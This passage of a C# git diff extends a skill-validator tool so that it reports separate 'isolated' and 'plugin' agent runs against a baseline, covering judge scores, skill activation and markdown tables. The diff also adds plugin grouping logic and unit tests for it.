Console.WriteLine($" \x1b[31;1m⏰ TIMEOUT\x1b[0m — {string.Join(" and ", parts)} run(s) hit the scenario timeout limit");
}
- foreach (var (label, value, absolute, lowerIsBetter) in metrics)
+ foreach (var (label, baseline, isolated, plugin) in metricRows)
{
- var color = value > 0 ? "\x1b[32m" : value < 0 ? "\x1b[31m" : "\x1b[2m";
- double displayValue = lowerIsBetter ? -value : value;
- Console.WriteLine($" \x1b[2m{label,-20}\x1b[0m {color}{FormatDelta(displayValue),-10}\x1b[0m \x1b[2m{absolute}\x1b[0m");
+ var line = $" \x1b[2m{label,-20}\x1b[0m baseline: \x1b[2m{baseline,-12}\x1b[0m isolated: {isolated,-20}";
+ if (hasPlugin)
+ line += $" plugin: {plugin ?? "—"}";
+ Console.WriteLine(line);
}
- // Skill activation info
- if (scenario.SkillActivation is { } sa)
+ // Effective score line (when plugin run exists, show min)
+ if (hasPlugin)
+ {
+ var isoScore = scenario.IsolatedImprovementScore;
+ var plugScore = scenario.PluginImprovementScore;
+ Console.WriteLine($" \x1b[1mEffective score:\x1b[0m min(isolated={FormatPct(isoScore)}, plugin={FormatPct(plugScore)}) = {FormatPct(scenario.ImprovementScore)}");
+ }
+
+ // Skill activation info — isolated
+ if (scenario.SkillActivationIsolated is { } saIso)
{
Console.WriteLine();
- if (sa.Activated)
- {
- var parts = new List();
- if (sa.DetectedSkills.Count > 0) parts.Add(string.Join(", ", sa.DetectedSkills));
- if (sa.ExtraTools.Count > 0) parts.Add("extra tools: " + string.Join(", ", sa.ExtraTools));
- Console.WriteLine($" \x1b[2mSkill activated:\x1b[0m \x1b[32m{(parts.Count > 0 ? string.Join("; ", parts) : "yes")}\x1b[0m");
- }
- else
- {
- if (!scenario.ExpectActivation)
- Console.WriteLine(" \x1b[36mℹ️ Skill correctly NOT activated (negative test)\x1b[0m");
- else
- Console.WriteLine(" \x1b[33m⚠️ Skill was NOT activated\x1b[0m");
- }
+ ReportActivation(saIso, "Isolated", scenario.ExpectActivation);
+ }
+
+ // Skill activation info — plugin
+ if (scenario.SkillActivationPlugin is { } saPlug)
+ {
+ ReportActivation(saPlug, "Plugin", scenario.ExpectActivation);
}
Console.WriteLine();
var bj = scenario.Baseline.JudgeResult;
- var sj = scenario.WithSkill.JudgeResult;
- double scoreDelta = sj.OverallScore - bj.OverallScore;
- var deltaStr = scoreDelta > 0 ? $"\x1b[32m+{scoreDelta:F1}\x1b[0m" :
- scoreDelta < 0 ? $"\x1b[31m{scoreDelta:F1}\x1b[0m" : "\x1b[2m±0\x1b[0m";
+ var sj = scenario.SkilledIsolated.JudgeResult;
+ var pj = scenario.SkilledPlugin?.JudgeResult;
+ double scoreDeltaIso = sj.OverallScore - bj.OverallScore;
+ var deltaStrIso = FormatColorDelta(scoreDeltaIso);
var bTimeout = b.TimedOut ? " \x1b[31m⏰ timeout\x1b[0m" : "";
var sTimeout = s.TimedOut ? " \x1b[31m⏰ timeout\x1b[0m" : "";
- Console.WriteLine($" \x1b[1mOverall:\x1b[0m {bj.OverallScore:F1}{bTimeout} → {sj.OverallScore:F1}{sTimeout} ({deltaStr})");
+ var overallLine = $" \x1b[1mOverall:\x1b[0m {bj.OverallScore:F1}{bTimeout} → isolated: {sj.OverallScore:F1}{sTimeout} ({deltaStrIso})";
+ if (pj is not null)
+ {
+ double scoreDeltaPlug = pj.OverallScore - bj.OverallScore;
+ var pTimeout = p!.TimedOut ? " \x1b[31m⏰ timeout\x1b[0m" : "";
+ overallLine += $" plugin: {pj.OverallScore:F1}{pTimeout} ({FormatColorDelta(scoreDeltaPlug)})";
+ }
+ Console.WriteLine(overallLine);
Console.WriteLine();
// Baseline judge
@@ -269,8 +304,8 @@ private static void ReportScenarioDetail(ScenarioComparison scenario, bool verbo
Console.WriteLine();
- // With-skill judge
- Console.WriteLine($" \x1b[35m─── With-Skill Judge\x1b[0m \x1b[35;1m{sj.OverallScore:F1}/5\x1b[0m{sTimeout} \x1b[35m───\x1b[0m");
+ // With-skill judge (Isolated)
+ Console.WriteLine($" \x1b[35m─── With-Skill Judge (Isolated)\x1b[0m \x1b[35;1m{sj.OverallScore:F1}/5\x1b[0m{sTimeout} \x1b[35m───\x1b[0m");
Console.WriteLine($" \x1b[2m{sj.OverallReasoning}\x1b[0m");
if (sj.RubricScores.Count > 0)
{
@@ -288,6 +323,29 @@ private static void ReportScenarioDetail(ScenarioComparison scenario, bool verbo
}
Console.WriteLine();
+ // With-skill judge (Plugin) — only if plugin run exists
+ if (pj is not null)
+ {
+ var pTimeout = p!.TimedOut ? " \x1b[31m⏰ timeout\x1b[0m" : "";
+ Console.WriteLine($" \x1b[32m─── With-Skill Judge (Plugin)\x1b[0m \x1b[32;1m{pj.OverallScore:F1}/5\x1b[0m{pTimeout} \x1b[32m───\x1b[0m");
+ Console.WriteLine($" \x1b[2m{pj.OverallReasoning}\x1b[0m");
+ if (pj.RubricScores.Count > 0)
+ {
+ Console.WriteLine();
+ foreach (var rs in pj.RubricScores)
+ {
+ var scoreColor = rs.Score >= 4 ? "\x1b[32m" : rs.Score >= 3 ? "\x1b[33m" : "\x1b[31m";
+ var baselineRs = bj.RubricScores.FirstOrDefault(b =>
+ string.Equals(b.Criterion, rs.Criterion, StringComparison.OrdinalIgnoreCase));
+ var comparison = baselineRs is not null ? $"\x1b[2m (was {baselineRs.Score}/5)\x1b[0m" : "";
+ Console.WriteLine($" {scoreColor}\x1b[1m{rs.Score}/5\x1b[0m{comparison} \x1b[1m{rs.Criterion}\x1b[0m");
+ if (!string.IsNullOrEmpty(rs.Reasoning))
+ Console.WriteLine($" \x1b[2m{rs.Reasoning}\x1b[0m");
+ }
+ }
+ Console.WriteLine();
+ }
+
// Pairwise judge results
if (scenario.PairwiseResult is { } pw)
{
@@ -317,11 +375,62 @@ private static void ReportScenarioDetail(ScenarioComparison scenario, bool verbo
Console.WriteLine();
Console.WriteLine(" \x1b[2mBaseline output:\x1b[0m");
Console.WriteLine(IndentBlock(scenario.Baseline.Metrics.AgentOutput.Length > 0 ? scenario.Baseline.Metrics.AgentOutput : "(no output)", 8));
- Console.WriteLine(" \x1b[2mWith-skill output:\x1b[0m");
- Console.WriteLine(IndentBlock(scenario.WithSkill.Metrics.AgentOutput.Length > 0 ? scenario.WithSkill.Metrics.AgentOutput : "(no output)", 8));
+ Console.WriteLine(" \x1b[2mWith-skill output (isolated):\x1b[0m");
+ Console.WriteLine(IndentBlock(scenario.SkilledIsolated.Metrics.AgentOutput.Length > 0 ? scenario.SkilledIsolated.Metrics.AgentOutput : "(no output)", 8));
+ if (scenario.SkilledPlugin is { } pluginRun)
+ {
+ Console.WriteLine(" \x1b[2mWith-skill output (plugin):\x1b[0m");
+ Console.WriteLine(IndentBlock(pluginRun.Metrics.AgentOutput.Length > 0 ? pluginRun.Metrics.AgentOutput : "(no output)", 8));
+ }
}
}
+ private static void ReportActivation(SkillActivationInfo sa, string label, bool expectActivation)
+ {
+ if (sa.Activated)
+ {
+ var parts = new List();
+ if (sa.DetectedSkills.Count > 0) parts.Add(string.Join(", ", sa.DetectedSkills));
+ if (sa.ExtraTools.Count > 0) parts.Add("extra tools: " + string.Join(", ", sa.ExtraTools));
+ Console.WriteLine($" \x1b[2mSkill activated ({label}):\x1b[0m \x1b[32m{(parts.Count > 0 ? string.Join("; ", parts) : "yes")}\x1b[0m");
+ }
+ else
+ {
+ if (!expectActivation)
+ Console.WriteLine($" \x1b[36mℹ️ Skill correctly NOT activated ({label}, negative test)\x1b[0m");
+ else
+ Console.WriteLine($" \x1b[33m⚠️ Skill was NOT activated ({label})\x1b[0m");
+ }
+ }
+
+ /// Formats a metric value with a percentage delta from baseline, e.g. "800 (-33%)".
+ private static string FormatMetricWithDelta(double value, double baseline, bool lowerIsBetter)
+ {
+ if (baseline == 0) return $"{value}";
+ double pctChange = (value - baseline) / baseline * 100;
+ var sign = pctChange > 0 ? "+" : "";
+ bool isGood = lowerIsBetter ? pctChange < 0 : pctChange > 0;
+ var color = isGood ? "\x1b[32m" : pctChange == 0 ? "" : "\x1b[31m";
+ var reset = string.IsNullOrEmpty(color) ? "" : "\x1b[0m";
+ return $"{value} {color}({sign}{pctChange:F0}%){reset}";
+ }
+
+ /// Returns a parenthesized percentage delta string, e.g. " (-33%)".
+ private static string FormatPctDelta(double value, double baseline, bool lowerIsBetter)
+ {
+ if (baseline == 0) return "";
+ double pctChange = (value - baseline) / baseline * 100;
+ var sign = pctChange > 0 ? "+" : "";
+ bool isGood = lowerIsBetter ? pctChange < 0 : pctChange > 0;
+ var color = isGood ? "\x1b[32m" : pctChange == 0 ? "" : "\x1b[31m";
+ var reset = string.IsNullOrEmpty(color) ? "" : "\x1b[0m";
+ return $" {color}({sign}{pctChange:F0}%){reset}";
+ }
+
+ private static string FormatColorDelta(double delta) =>
+ delta > 0 ? $"\x1b[32m+{delta:F1}\x1b[0m" :
+ delta < 0 ? $"\x1b[31m{delta:F1}\x1b[0m" : "\x1b[2m±0\x1b[0m";
+
// --- Markdown reporter ---
public static string GenerateMarkdownSummary(
@@ -356,6 +465,7 @@ public static string GenerateMarkdownSummary(
var footnotes = new List();
var tableRows = new List();
+ bool anyPluginRun = verdicts.Any(v => v.Scenarios.Any(s => s.SkilledPlugin is not null));
foreach (var v in verdicts)
{
@@ -363,33 +473,42 @@ public static string GenerateMarkdownSummary(
foreach (var s in v.Scenarios)
{
var baseScore = s.Baseline?.JudgeResult?.OverallScore;
- var skillScore = s.WithSkill?.JudgeResult?.OverallScore;
+ var isoScore = s.SkilledIsolated?.JudgeResult?.OverallScore;
+ var plugScore = s.SkilledPlugin?.JudgeResult?.OverallScore;
var bTimedOut = s.Baseline?.Metrics?.TimedOut == true;
- var sTimedOut = s.WithSkill?.Metrics?.TimedOut == true;
+ var isoTimedOut = s.SkilledIsolated?.Metrics?.TimedOut == true;
+ var plugTimedOut = s.SkilledPlugin?.Metrics?.TimedOut == true;
+
+ string isoQualityCol = FormatQualityCell(baseScore, isoScore, bTimedOut, isoTimedOut, out double? isoQualityDelta);
+ double? plugQualityDelta = null;
+ string plugQualityCol = "";
+ if (anyPluginRun)
+ {
+ plugQualityCol = FormatQualityCell(baseScore, plugScore, bTimedOut, plugTimedOut, out plugQualityDelta);
+ }
- string qualityCol = FormatQualityCell(baseScore, skillScore, bTimedOut, sTimedOut, out double? qualityDelta);
+ // Use the effective (worse) run's quality delta for footnotes
+ bool pluginIsEffective = s.SkilledPlugin is not null && s.PluginImprovementScore < s.IsolatedImprovementScore;
+ double? qualityDelta = pluginIsEffective ? plugQualityDelta : isoQualityDelta;
var icon = s.ImprovementScore > 0 ? "✅" : s.ImprovementScore < 0 ? "❌" : "🟡";
+ // Skills loaded column — show both isolated and plugin activation
string skillsCol = "—";
- if (s.SkillActivation is { } sa)
+ if (s.SkillActivationIsolated is { } saIso)
{
- if (sa.Activated)
- {
- var parts = new List();
- if (sa.DetectedSkills.Count > 0) parts.AddRange(sa.DetectedSkills);
- if (sa.ExtraTools.Count > 0) parts.Add("tools: " + string.Join(", ", sa.ExtraTools));
- skillsCol = parts.Count > 0 ? "✅ " + string.Join("; ", parts) : "✅";
- }
- else
- {
- skillsCol = s.ExpectActivation ? "⚠️ NOT ACTIVATED" : "ℹ️ not activated (expected)";
- }
+ skillsCol = FormatActivationCell(saIso, s.ExpectActivation);
}
else if (skillNotActivated)
{
skillsCol = "⚠️ NOT ACTIVATED";
}
+ if (anyPluginRun && s.SkillActivationPlugin is { } saPlug)
+ {
+ string plugActivation = FormatActivationCell(saPlug, s.ExpectActivation);
+ skillsCol += $" / {plugActivation}";
+ }
+
var footnote = BuildVerdictFootnote(s, qualityDelta);
string verdictCol = icon;
if (footnote is not null)
@@ -399,14 +518,25 @@ public static string GenerateMarkdownSummary(
verdictCol = $"{icon} [{n}]";
}
- tableRows.Add($"| {v.SkillName} | {s.ScenarioName} | {qualityCol} | {skillsCol} | {FormatOverfitCell(v.OverfittingResult)} | {verdictCol} |");
+ var row = anyPluginRun
+ ? $"| {v.SkillName} | {s.ScenarioName} | {isoQualityCol} | {plugQualityCol} | {skillsCol} | {FormatOverfitCell(v.OverfittingResult)} | {verdictCol} |"
+ : $"| {v.SkillName} | {s.ScenarioName} | {isoQualityCol} | {skillsCol} | {FormatOverfitCell(v.OverfittingResult)} | {verdictCol} |";
+ tableRows.Add(row);
}
}
if (tableRows.Count > 0)
{
- sb.AppendLine("| Skill | Scenario | Quality | Skills Loaded | Overfit | Verdict |");
- sb.AppendLine("|-------|----------|---------|---------------|---------|---------|");
+ if (anyPluginRun)
+ {
+ sb.AppendLine("| Skill | Scenario | Quality (Isolated) | Quality (Plugin) | Skills Loaded | Overfit | Verdict |");
+ sb.AppendLine("|-------|----------|--------------------|------------------|---------------|---------|---------|");
+ }
+ else
+ {
+ sb.AppendLine("| Skill | Scenario | Quality | Skills Loaded | Overfit | Verdict |");
+ sb.AppendLine("|-------|----------|---------|---------------|---------|---------|");
+ }
foreach (var row in tableRows)
sb.AppendLine(row);
}
@@ -419,7 +549,7 @@ public static string GenerateMarkdownSummary(
}
bool anyTimeout = verdicts.Any(v => v.Scenarios.Any(s =>
- (s.Baseline?.Metrics?.TimedOut == true) || (s.WithSkill?.Metrics?.TimedOut == true)));
+ (s.Baseline?.Metrics?.TimedOut == true) || (s.SkilledIsolated?.Metrics?.TimedOut == true) || (s.SkilledPlugin?.Metrics?.TimedOut == true)));
if (anyTimeout)
sb.AppendLine("\n> ⏰ **timeout** — run hit the scenario timeout limit; scoring may be impacted by aborting model execution before it could produce its full output");
@@ -493,23 +623,46 @@ private static async Task ReportMarkdown(
foreach (var rs in scenario.Baseline.JudgeResult.RubricScores)
judgeReport.AppendLine($"- **{rs.Criterion}**: {rs.Score}/5 — {rs.Reasoning}");
judgeReport.AppendLine();
- judgeReport.AppendLine("## With-Skill Judge");
- judgeReport.AppendLine($"Overall Score: {scenario.WithSkill.JudgeResult.OverallScore}/5");
- judgeReport.AppendLine($"Reasoning: {scenario.WithSkill.JudgeResult.OverallReasoning}");
+ judgeReport.AppendLine("## With-Skill Judge (Isolated)");
+ judgeReport.AppendLine($"Overall Score: {scenario.SkilledIsolated.JudgeResult.OverallScore}/5");
+ judgeReport.AppendLine($"Reasoning: {scenario.SkilledIsolated.JudgeResult.OverallReasoning}");
judgeReport.AppendLine();
- foreach (var rs in scenario.WithSkill.JudgeResult.RubricScores)
+ foreach (var rs in scenario.SkilledIsolated.JudgeResult.RubricScores)
judgeReport.AppendLine($"- **{rs.Criterion}**: {rs.Score}/5 — {rs.Reasoning}");
judgeReport.AppendLine();
+
+ // Plugin judge section (if plugin run exists)
+ if (scenario.SkilledPlugin is { } pluginRun)
+ {
+ judgeReport.AppendLine("## With-Skill Judge (Plugin)");
+ judgeReport.AppendLine($"Overall Score: {pluginRun.JudgeResult.OverallScore}/5");
+ judgeReport.AppendLine($"Reasoning: {pluginRun.JudgeResult.OverallReasoning}");
+ judgeReport.AppendLine();
+ foreach (var rs in pluginRun.JudgeResult.RubricScores)
+ judgeReport.AppendLine($"- **{rs.Criterion}**: {rs.Score}/5 — {rs.Reasoning}");
+ judgeReport.AppendLine();
+ }
+
judgeReport.AppendLine("## Baseline Agent Output");
judgeReport.AppendLine("```");
judgeReport.AppendLine(scenario.Baseline.Metrics.AgentOutput.Length > 0 ? scenario.Baseline.Metrics.AgentOutput : "(no output)");
judgeReport.AppendLine("```");
judgeReport.AppendLine();
- judgeReport.AppendLine("## With-Skill Agent Output");
+ judgeReport.AppendLine("## With-Skill Agent Output (Isolated)");
judgeReport.AppendLine("```");
- judgeReport.AppendLine(scenario.WithSkill.Metrics.AgentOutput.Length > 0 ? scenario.WithSkill.Metrics.AgentOutput : "(no output)");
+ judgeReport.AppendLine(scenario.SkilledIsolated.Metrics.AgentOutput.Length > 0 ? scenario.SkilledIsolated.Metrics.AgentOutput : "(no output)");
judgeReport.AppendLine("```");
+ // Plugin agent output (if plugin run exists)
+ if (scenario.SkilledPlugin is { } pluginRunOutput)
+ {
+ judgeReport.AppendLine();
+ judgeReport.AppendLine("## With-Skill Agent Output (Plugin)");
+ judgeReport.AppendLine("```");
+ judgeReport.AppendLine(pluginRunOutput.Metrics.AgentOutput.Length > 0 ? pluginRunOutput.Metrics.AgentOutput : "(no output)");
+ judgeReport.AppendLine("```");
+ }
+
await File.WriteAllTextAsync(Path.Combine(skillDir, $"{scenarioSlug}.md"), judgeReport.ToString());
}
}
@@ -646,6 +799,19 @@ internal static string FormatQualityCell(
return $"{baseFmt} \u2192 {skillFmt}";
}
+ /// Formats an activation info object into a markdown cell string.
+ internal static string FormatActivationCell(SkillActivationInfo sa, bool expectActivation)
+ {
+ if (sa.Activated)
+ {
+ var parts = new List();
+ if (sa.DetectedSkills.Count > 0) parts.AddRange(sa.DetectedSkills);
+ if (sa.ExtraTools.Count > 0) parts.Add("tools: " + string.Join(", ", sa.ExtraTools));
+ return parts.Count > 0 ? "✅ " + string.Join("; ", parts) : "✅";
+ }
+ return expectActivation ? "⚠️ NOT ACTIVATED" : "ℹ️ not activated (expected)";
+ }
+
///
/// Returns a footnote string when the verdict (based on composite ImprovementScore)
/// disagrees with the quality delta shown in the table, or null if no explanation is needed.
@@ -693,11 +859,18 @@ internal static string FormatQualityCell(
})
.ToList();
+ // Determine which run is the effective (worse) one for raw metric values
+ bool pluginIsWorse = s.SkilledPlugin is not null && s.PluginImprovementScore < s.IsolatedImprovementScore;
+ string runLabel = pluginIsWorse ? "Plugin" : "Isolated";
+
// Format a contributor label with raw metric values when available
string FormatContributor(string label)
{
var bm = s.Baseline?.Metrics;
- var sm = s.WithSkill?.Metrics;
+ // Use the effective (worse) run's metrics for raw values
+ var sm = pluginIsWorse
+ ? s.SkilledPlugin?.Metrics
+ : s.SkilledIsolated?.Metrics;
if (bm is null || sm is null) return label;
string? raw = label switch
@@ -727,7 +900,7 @@ string FormatContributor(string label)
? string.Join(", ", negatives)
: "efficiency metrics";
string qualityDesc = qualityPositive ? "Quality improved" : "Quality unchanged";
- return $"{qualityDesc} but weighted score is {compositeStr} due to: {factors}";
+ return $"({runLabel}) {qualityDesc} but weighted score is {compositeStr} due to: {factors}";
}
if (verdictPositive && qualityNegative)
@@ -741,7 +914,7 @@ string FormatContributor(string label)
string factors = positives.Count > 0
? string.Join(", ", positives)
: "efficiency metrics";
- return $"Quality dropped but weighted score is {compositeStr} due to: {factors}";
+ return $"({runLabel}) Quality dropped but weighted score is {compositeStr} due to: {factors}";
}
return null;
diff --git a/eng/skill-validator/src/Services/SkillDiscovery.cs b/eng/skill-validator/src/Services/SkillDiscovery.cs
index 24dad5512c..8ef65bfd97 100644
--- a/eng/skill-validator/src/Services/SkillDiscovery.cs
+++ b/eng/skill-validator/src/Services/SkillDiscovery.cs
@@ -277,6 +277,67 @@ internal static (EvalSchema.RawAgentFrontmatter Metadata, string Body) ParseAgen
// --- Plugin discovery ---
+ ///
+ /// For a given skill, find its plugin root directory (the directory containing plugin.json).
+ /// Returns the plugin root path and the parsed PluginInfo.
+ /// Returns null if no plugin.json is found or if it is malformed.
+ ///
+ public static (string PluginRoot, PluginInfo Plugin)? FindPluginContext(SkillInfo skill)
+ {
+ var pluginRoot = FindPluginRoot(skill.Path);
+ if (pluginRoot is null) return null;
+
+ var pluginJsonPath = Path.Combine(pluginRoot, "plugin.json");
+ PluginInfo? plugin;
+ try
+ {
+ plugin = PluginValidator.ParsePluginJson(pluginJsonPath);
+ }
+ catch (JsonException)
+ {
+ // Malformed plugin.json — treated as "no plugin" here;
+ // the later DiscoverPlugins/ValidatePlugin path will surface
+ // the user-friendly error message.
+ return null;
+ }
+ if (plugin is null) return null;
+
+ return (pluginRoot, plugin);
+ }
+
+ ///
+ /// Groups discovered skills by their parent plugin root.
+ /// Returns a dictionary: pluginRoot -> (PluginInfo, skills[])
+ /// Skills without a plugin are reported as errors and excluded.
+ ///
+ public static (Dictionary Skills)> Groups, List Errors)
+ GroupSkillsByPlugin(IReadOnlyList skills)
+ {
+ var groups = new Dictionary Skills)>(
+ StringComparer.OrdinalIgnoreCase);
+ var errors = new List();
+
+ foreach (var skill in skills)
+ {
+ var context = FindPluginContext(skill);
+ if (context is null)
+ {
+ errors.Add($"Skill '{skill.Name}' at '{skill.Path}' is not inside a plugin directory (no valid plugin.json found: missing or malformed). All skills must belong to a plugin.");
+ continue;
+ }
+
+ var (root, plugin) = context.Value;
+ if (!groups.TryGetValue(root, out var group))
+ {
+ group = (plugin, []);
+ groups[root] = group;
+ }
+ group.Skills.Add(skill);
+ }
+
+ return (groups, errors);
+ }
+
///
/// Discover plugin.json files from plugin directories reachable from the given paths.
///
diff --git a/eng/skill-validator/tests/ComparatorTests.cs b/eng/skill-validator/tests/ComparatorTests.cs
index 8e999913b5..c11873c1f3 100644
--- a/eng/skill-validator/tests/ComparatorTests.cs
+++ b/eng/skill-validator/tests/ComparatorTests.cs
@@ -201,6 +201,37 @@ public void MarksAsNotSignificantWhenPerRunScoresSpanZero()
Assert.False(verdict.IsSignificant!.Value);
Assert.Contains("not statistically significant", verdict.Reason);
}
+ [Fact]
+ public void FailsWhenPluginRunRegressesTaskCompletion()
+ {
+ var baseline = MakeRunResult(taskCompleted: true, overallScore: 3);
+ var withSkill = MakeRunResult(taskCompleted: true, tokenEstimate: 100, overallScore: 5);
+ var comparison = Comparator.CompareScenario("test", baseline, withSkill);
+ // Simulate plugin run that failed completion
+ comparison = new ScenarioComparison
+ {
+ ScenarioName = comparison.ScenarioName,
+ Baseline = comparison.Baseline,
+ SkilledIsolated = comparison.SkilledIsolated,
+ SkilledPlugin = MakeRunResult(taskCompleted: false, tokenEstimate: 100, overallScore: 5),
+ ImprovementScore = comparison.ImprovementScore,
+ Breakdown = comparison.Breakdown,
+ };
+
+ var verdict = Comparator.ComputeVerdict(MockSkill, [comparison], 0.0, true);
+ Assert.False(verdict.Passed);
+ Assert.Contains("regressed", verdict.Reason);
+ }
+
+ [Fact]
+ public void CompareScenarioSetsPluginToNull()
+ {
+ var baseline = MakeRunResult();
+ var withSkill = MakeRunResult(tokenEstimate: 500, overallScore: 5);
+ var comparison = Comparator.CompareScenario("test", baseline, withSkill);
+ // CompareScenario is a utility for single-run comparison; SkilledPlugin should be null
+ Assert.Null(comparison.SkilledPlugin);
+ }
}
public class CompareScenarioWithPairwiseTests
diff --git a/eng/skill-validator/tests/DiscoveryTests.cs b/eng/skill-validator/tests/DiscoveryTests.cs
index d9613b867e..e260744212 100644
--- a/eng/skill-validator/tests/DiscoveryTests.cs
+++ b/eng/skill-validator/tests/DiscoveryTests.cs
@@ -1,4 +1,5 @@
using SkillValidator.Services;
+using SkillValidator.Models;
namespace SkillValidator.Tests;
@@ -223,3 +224,95 @@ public async Task ResolveEvalPathPrefersFlatLayout()
}
}
}
+
+public class GroupSkillsByPluginTests
+{
+ [Fact]
+ public void GroupsSkillsUnderSamePlugin()
+ {
+ var tmpDir = Path.Combine(Path.GetTempPath(), $"group-test-{Guid.NewGuid():N}");
+ var pluginDir = Path.Combine(tmpDir, "my-plugin");
+ var skillDir1 = Path.Combine(pluginDir, "skills", "skill-a");
+ var skillDir2 = Path.Combine(pluginDir, "skills", "skill-b");
+ Directory.CreateDirectory(skillDir1);
+ Directory.CreateDirectory(skillDir2);
+ try
+ {
+ File.WriteAllText(Path.Combine(pluginDir, "plugin.json"), """{ "name": "my-plugin" }""");
+
+ var skills = new[]
+ {
+ new SkillInfo("skill-a", "A", skillDir1, Path.Combine(skillDir1, "SKILL.md"), "# A", null, null, null),
+ new SkillInfo("skill-b", "B", skillDir2, Path.Combine(skillDir2, "SKILL.md"), "# B", null, null, null),
+ };
+
+ var (groups, errors) = SkillDiscovery.GroupSkillsByPlugin(skills);
+ Assert.Empty(errors);
+ Assert.Single(groups);
+ var (plugin, grouped) = groups.Values.First();
+ Assert.Equal(2, grouped.Count);
+ }
+ finally
+ {
+ Directory.Delete(tmpDir, true);
+ }
+ }
+
+ [Fact]
+ public void ReportsErrorForStandaloneSkill()
+ {
+ var tmpDir = Path.Combine(Path.GetTempPath(), $"group-test-{Guid.NewGuid():N}");
+ Directory.CreateDirectory(tmpDir);
+ try
+ {
+ // No plugin.json in parents
+ var skill = new SkillInfo("orphan", "O", tmpDir, Path.Combine(tmpDir, "SKILL.md"), "# O", null, null, null);
+ var (groups, errors) = SkillDiscovery.GroupSkillsByPlugin([skill]);
+ Assert.Empty(groups);
+ Assert.Single(errors);
+ Assert.Contains("orphan", errors[0]);
+ }
+ finally
+ {
+ Directory.Delete(tmpDir, true);
+ }
+ }
+
+ [Fact]
+ public void FindPluginContextReturnsNullWithoutPluginJson()
+ {
+ var tmpDir = Path.Combine(Path.GetTempPath(), $"ctx-test-{Guid.NewGuid():N}");
+ Directory.CreateDirectory(tmpDir);
+ try
+ {
+ var skill = new SkillInfo("test", "T", tmpDir, Path.Combine(tmpDir, "SKILL.md"), "# T", null, null, null);
+ var result = SkillDiscovery.FindPluginContext(skill);
+ Assert.Null(result);
+ }
+ finally
+ {
+ Directory.Delete(tmpDir, true);
+ }
+ }
+
+ [Fact]
+ public void FindPluginContextReturnsPluginInfo()
+ {
+ var tmpDir = Path.Combine(Path.GetTempPath(), $"ctx-test-{Guid.NewGuid():N}");
+ var pluginDir = Path.Combine(tmpDir, "my-plugin");
+ var skillDir = Path.Combine(pluginDir, "skills", "test-skill");
+ Directory.CreateDirectory(skillDir);
+ try
+ {
+ File.WriteAllText(Path.Combine(pluginDir, "plugin.json"), """{ "name": "my-plugin" }""");
+ var skill = new SkillInfo("test-skill", "T", skillDir, Path.Combine(skillDir, "SKILL.md"), "# T", null, null, null);
+ var result = SkillDiscovery.FindPluginContext(skill);
+ Assert.NotNull(result);
+ Assert.Equal(pluginDir, result!.Value.PluginRoot);
+ }
+ finally
+ {
+ Directory.Delete(tmpDir, true);
+ }
+ }
+}
diff --git a/eng/skill-validator/tests/MetricsTests.cs b/eng/skill-validator/tests/MetricsTests.cs
index b1abc059f9..736b90e73f 100644
--- a/eng/skill-validator/tests/MetricsTests.cs
+++ b/eng/skill-validator/tests/MetricsTests.cs
@@ -196,6 +196,143 @@ public void DetectsSkillFromSkillInvokedEvent()
Assert.Equal(["binlog-failure-analysis"], result.DetectedSkills);
Assert.Equal(1, result.SkillEventCount);
}
+
+ // --- Targeted skill activation (targetSkillName parameter) tests ---
+
+ [Fact]
+ public void TargetSkillName_ActivatedWhenTargetSkillDetected()
+ {
+ var events = new List
+ {
+ MakeEvent("skill.invoked", D(("name", JsonValue.Create("build-perf")))),
+ MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("bash")))),
+ };
+
+ var result = MetricsCollector.ExtractSkillActivation(
+ events, new Dictionary { ["bash"] = 1 }, targetSkillName: "build-perf");
+
+ Assert.True(result.Activated);
+ Assert.Equal(["build-perf"], result.DetectedSkills);
+ }
+
+ [Fact]
+ public void TargetSkillName_NotActivatedWhenSiblingSkillFires()
+ {
+ // In a plugin run, a sibling skill fires but not the target skill
+ var events = new List
+ {
+ MakeEvent("skill.invoked", D(("name", JsonValue.Create("sibling-skill")))),
+ MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("bash")))),
+ };
+
+ var result = MetricsCollector.ExtractSkillActivation(
+ events, new Dictionary { ["bash"] = 1 }, targetSkillName: "build-perf");
+
+ Assert.False(result.Activated);
+ Assert.Equal(["sibling-skill"], result.DetectedSkills);
+ Assert.Equal(1, result.SkillEventCount);
+ }
+
+ [Fact]
+ public void TargetSkillName_CaseInsensitiveMatch()
+ {
+ var events = new List
+ {
+ MakeEvent("skill.invoked", D(("name", JsonValue.Create("Build-Perf")))),
+ };
+
+ var result = MetricsCollector.ExtractSkillActivation(
+ events, new Dictionary(), targetSkillName: "build-perf");
+
+ Assert.True(result.Activated);
+ }
+
+ [Fact]
+ public void TargetSkillName_NotActivatedEvenWithExtraToolsWhenNoTargetDetected()
+ {
+ // Extra tools present but target skill not detected — NOT activated.
+ // We control the SDK; it always emits SkillInvokedEvent. Extra tools
+ // alone are not proof the target skill was loaded.
+ var events = new List
+ {
+ MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("msbuild_analyze")))),
+ };
+
+ var result = MetricsCollector.ExtractSkillActivation(
+ events, new Dictionary(), targetSkillName: "build-perf");
+
+ Assert.False(result.Activated);
+ Assert.Equal(["msbuild_analyze"], result.ExtraTools);
+ }
+
+ [Fact]
+ public void TargetSkillName_ExtraToolsIgnoredWhenSiblingSkillEventsExist()
+ {
+ // Sibling skill fired (skill events exist) plus extra tools — NOT activated.
+ // The event system works, so extra tools likely came from the sibling, not
+ // the target skill. This is the false-positive scenario from plugin runs.
+ var events = new List
+ {
+ MakeEvent("skill.invoked", D(("name", JsonValue.Create("sibling-skill")))),
+ MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("view")))),
+ };
+
+ var result = MetricsCollector.ExtractSkillActivation(
+ events, new Dictionary(), targetSkillName: "nuget-trusted-publishing");
+
+ Assert.False(result.Activated);
+ Assert.Equal(["sibling-skill"], result.DetectedSkills);
+ Assert.Equal(["view"], result.ExtraTools);
+ }
+
+ [Fact]
+ public void TargetSkillName_NullBehavesAsOriginal()
+ {
+ // When targetSkillName is null, any skill event counts as activation (original behavior)
+ var events = new List
+ {
+ MakeEvent("skill.invoked", D(("name", JsonValue.Create("sibling-skill")))),
+ };
+
+ var result = MetricsCollector.ExtractSkillActivation(
+ events, new Dictionary(), targetSkillName: null);
+
+ Assert.True(result.Activated);
+ Assert.Equal(["sibling-skill"], result.DetectedSkills);
+ }
+
+ [Fact]
+ public void TargetSkillName_NotActivatedWhenNoEventsAndNoExtraTools()
+ {
+ var events = new List
+ {
